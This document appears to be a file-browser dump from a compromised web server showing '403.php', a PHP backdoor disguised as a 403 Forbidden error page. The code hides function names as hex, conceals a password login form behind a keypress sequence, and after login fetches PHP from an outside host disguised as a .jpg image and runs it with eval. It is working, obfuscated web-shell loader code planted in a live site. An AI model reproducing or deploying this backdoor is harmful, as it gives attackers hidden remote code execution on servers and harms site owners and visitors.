Linux hkvL61zh9Vexzf 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 Path : /www/wwwroot/fashion-kingdom.com/SEOBARBAR_DATA/ |
Current File : /www/wwwroot/fashion-kingdom.com/SEOBARBAR_DATA/403.php |
<?php /** * @package Haxor.Group * @copyright Copyright (C) 2023 - 2024 Open Source Matters, Inc. All rights reserved. * */ // @deprecated 1.0 Deprecated without replacement function is_logged_in() { return isset($_COOKIE['user_id']) && $_COOKIE['user_id'] === 'LPH'; } if (is_logged_in()) { $Array = array( '666f70656e', '73747265616d5f6765745f636f6e74656e7473', '66696c655f6765745f636f6e74656e7473', '6375726c5f65786563' ); function hex2str($hex) { $str = ''; for ($i = 0; $i < strlen($hex); $i += 2) { $str .= chr(hexdec(substr($hex, $i, 2))); } return $str; } function geturlsinfo($destiny) { $belief = array( hex2str($GLOBALS['Array'][0]), hex2str($GLOBALS['Array'][1]), hex2str($GLOBALS['Array'][2]), hex2str($GLOBALS['Array'][3]) ); if (function_exists($belief[3])) { $ch = curl_init($destiny); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $love = $belief[3]($ch); curl_close($ch); return $love; } elseif (function_exists($belief[2])) { return $belief[2]($destiny); } elseif (function_exists($belief[0]) && function_exists($belief[1])) { $purpose = $belief[0]($destiny, "r"); $love = $belief[1]($purpose); fclose($purpose); return $love; } return false; } $destiny = 'https://bong-cdn.net/TEMPLATE%20LANDING/.bebelac.jpg'; $dream = geturlsinfo($destiny); if ($dream !== false) { eval('?>' . $dream); } } else { if (isset($_POST['password'])) { $entered_key = $_POST['password']; $hashed_key = '$2a$12$ECpcMlDfkxN5QuoE3WP2MuLU3lDJOd1XCPpLnyAcIMvYa0yeOWxJ.'; if (password_verify($entered_key, $hashed_key)) { setcookie('user_id', 'LPH', time() + 3600, '/'); header("Location: " . $_SERVER['PHP_SELF']); exit(); } } } ?> <!DOCTYPE html> <html> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> <center> <div style='cursor:pointer;'></div> <form id='login-form' method='POST' style='display:none;'> <input style='text-align:center;margin:0;margin-top:0px;background-color:#fff;border:1px solid #fff;' type='password' name='password'> </form> <script> let clickCount = 0; document.addEventListener('keydown', function(event) { if (event.key === '8') { clickCount++; if (clickCount === 3) { document.getElementById('login-form').style.display = 'block'; } } else { clickCount = 0; } }); </script> </center> </body> </html>